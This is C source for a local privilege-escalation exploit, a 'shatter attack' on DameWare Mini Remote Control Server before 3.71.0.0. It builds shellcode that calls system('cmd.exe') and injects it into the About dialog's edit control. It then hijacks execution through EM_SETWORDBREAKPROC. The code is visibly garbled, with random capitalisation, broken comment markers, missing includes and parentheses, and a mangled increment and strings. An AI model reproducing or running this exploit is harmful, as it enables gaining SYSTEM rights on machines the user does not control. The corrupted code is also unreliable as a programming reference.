/ *
Dameware Mini Remote Control Server Local System Exploit
Vulnerable Versions Prior to 3.71.0.0 by ash@felinemenmenace.org
This code is based on shards.cpp by Xenophile
* /
#define Win32_Lean_and_mean
#include
#include
#pragma Warning (Disable: 4305)
#pragma Warning (Disable: 4309)
Void Makeshellcode (Char * Buffer)
{
HModule HCRT;
Void * lpsystem;
INT count = 0;
While (count <36)
{
Buffer [count] = 0x90;
COUNT ;
}
Buffer [37] = 0x8b; buffer [38] = 0xE5; buffer [39] = 0x55;
Buffer [40] = 0x8b; buffer [41] = 0xec; buffer [42] = 0x33;
Buffer [43] = 0xff; buffer [44] = 0x90; buffer [45] = 0x57;
Buffer [46] = 0x83; buffer [47] = 0xec; buffer [48] = 0x04;
Buffer [49] = 0xc6; buffer [50] = 0x45; buffer [51] = 0xF8;
Buffer [52] = 0x63; buffer [53] = 0xc6; buffer [54] = 0x45;
Buffer [55] = 0xf9; buffer [56] = 0x6d; buffer [57] = 0xc6;
Buffer [58] = 0x45; buffer [59] = 0xfa; buffer [60] = 0x64;
Buffer [61] = 0xc6; buffer [62] = 0x45; buffer [63] = 0xfb;
Buffer [64] = 0x2e; buffer [65] = 0xc6; buffer [66] = 0x45;
Buffer [67] = 0xfc; buffer [68] = 0x65; buffer [69] = 0xc6;
Buffer [70] = 0x45; buffer [71] = 0xfd; buffer [72] = 0x78;
Buffer [73] = 0xc6; buffer [74] = 0x45; buffer [75] = 0xfe;
Buffer [76] = 0x65;
HCRT = loadingLibrary ("msvcrt.dll");
lpsystem = getProcaddress (HCRT, "System");
Buffer [77] = 0xb8;
Buffer [78] = ((char *) & lpsystem) [0];
Buffer [79] = ((char *) & lpsystem) [1];
Buffer [80] = ((char *) & lpsystem) [2];
Buffer [81] = ((char *) & lpsystem) [3];
Buffer [82] = 0x50; buffer [83] = 0x8d; buffer [84] = 0x45;
Buffer [85] = 0xf8; buffer [86] = 0x50; buffer [87] = 0xff; buffer [88] = 0x55; buffer [89] = 0xF4;
Count = 90;
While (count <291)
{
Buffer [count] = 0x90;
COUNT ;
}
Buffer [291] = 0x24; buffer [292] = 0xf1; buffer [293] = 0x5d;
Buffer [294] = 0x01; buffer [295] = 0x26; buffer [296] = 0xf1;
Buffer [297] = 0x5d; buffer [298] = 0x01; BUFFER [299] = 0x00;
BUFFER [300] = 0x00;
Return;
}
Void ErrorNotify (DWORD ERR, Char * Title)
{
LPVOID LPMSGBUF;
FormatMessage
FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
Err,
Makelangid (lang_neutral, subslang_default), // default logage
(Lptstr) & lpmsgbuf,
0,
NULL
);
Printf ("% S / N", LPMSGBUF);
LocalFree (lpmsgbuf);
}
#define shellcode_size (1024 * 256)
#define shellcode_offset (shellcode_size -400)
Int main (int Argc, char * argv [])
{
Hwnd hwnd;
HWND HWNDCHILD;
CHAR SC [shellcode_size];
Char szwindowname [] = "About DameWare Mini Remote Control Server";
Long lexecaddress;
SC [0] = 'x'; sc [1] = 'e'; SC [2] = 'n'; SC [3] = '0';
MEMSET (& sc [4], 0x90, shellcode_size -4;
Makeshellcode (& SC [shellcode_offset);
Printf ("/nfm-shatterdame.c/nash@felinementece.org/N");
Printf ("--------------------------------------------- --------------- / n ");
Printf ("Exploits Shatter Attack in Dameware Mini Remote Control
Server / n ");
Printf ("this is based on shards.cpp written by xenophile./n");
Printf ("--------------------------------------------- --------------- / n ");
PRINTF
"Step 1: Finding Our WINDOW! / N"
);
HWND = FindWindow (Null, Szwindown);
IF (hwnd == null)
{
Printf ("COULDN't Find The DameWare About Dialogue. Open IT and RE-RUN
THIS / N ");
Return 0;
}
HWNDCHILD = FindWindowEx (HWND, NULL, "Edit", NULL;
IF (hwndchild == null)
{
Printf ("/ tcouldn't Find Child Edit Control WINDOW / N");
Return 0;
}
SendMessage (HWndchild, Em_setReadonly, 0, 0);
SendMessage (hwndchild, em_setlimittext, shellcode_size, 0L);
IF (! SENDMESSAGE (HWNDCHILD, WM_SETTEXT, 0, (LPARAM) SC)) {
ErrorNotify (GetLastError (), "Error");
}
PRINTF
"/ N / NSTEP 2: Enter shell code address."
"This can be bound using a debugger."
);
Printf ("/ Non My XP SP1 Machine 0x160000 Worked./N");
Printf ("/ N / NENTER EXECUTION Address:");
Scanf ("% x", & lexecaddress;
IF (! sendMessage (hwndchild, em_setwordbreakproc, 0L,
(LParam) LexecAddress)) {
ErrorNotify (GetLastError (), "Error");
}
SendMessage (hwndchild, wm_lbuttondblclk, mk_lbutton,
(Lparam) 0x000A000A);
Return 0;
}
